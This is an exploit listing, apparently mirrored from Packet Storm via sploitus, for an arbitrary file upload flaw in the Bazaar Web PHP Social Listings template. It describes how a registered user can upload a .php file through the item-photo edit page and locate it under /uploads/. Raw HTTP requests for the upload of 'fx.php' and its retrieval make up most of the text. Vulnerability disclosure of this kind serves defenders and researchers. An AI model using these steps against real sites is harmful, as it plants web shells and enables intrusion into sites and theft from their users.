Exploit for Bazaar Web PHP Social Listings Shell Upload

Name: Exploit for Bazaar Web PHP Social Listings Shell Upload
Rating: 5 (172 reviews)
2021-12-20 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:165370
<--  
  
# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload  
# Google Dork: N/A  
# Date: 19/12/2021  
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com  
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913  
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#  
# Category: webapps  
  
1. Description  
  
Bazaar Web PHP Social Listings script contain arbitrary file upload  
registered user can upload .php files in Edit an item section without  
any security  
  
list item link :  
  
localhost bazaar-web/list-item-info.php  
  
edit item photos and upload php files and inspect element your php  
direction  
  
uploaded file direction  
  
local host bazaar/uploads/yourfile.php  
  
just right click the photo and use inspect element you will have your  
direction  
  
  
  
Host: (HOST)  
  
Accept: */*  
  
Accept-Language: ar,en-US;q=0.7,en;q=0.3  
  
Accept-Encoding: gzip, deflate, br  
  
X-Requested-With: XMLHttpRequest  
  
Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199  
  
Content-Length: 63132  
  
Connection: keep-alive  
  
Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5  
  
Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt  
  
Sec-Fetch-Dest: empty  
  
Sec-Fetch-Mode: cors  
  
Sec-Fetch-Site: same-origin  
  
file=fx.php&fileName=fx.php  
  
GET  
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php  
  
Host: HOST  
  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
  
Accept: image/avif,image/webp,*/*  
  
Accept-Language: ar,en-US;q=0.7,en;q=0.3  
  
Accept-Encoding: gzip, deflate, br  
  
Connection: keep-alive  
  
Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5  
  
Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt  
  
Sec-Fetch-Dest: image  
  
Sec-Fetch-Mode: no-cors  
  
Sec-Fetch-Site: same-origin  
  
  
  
  
  
  
  
  
  
#####  
  
-->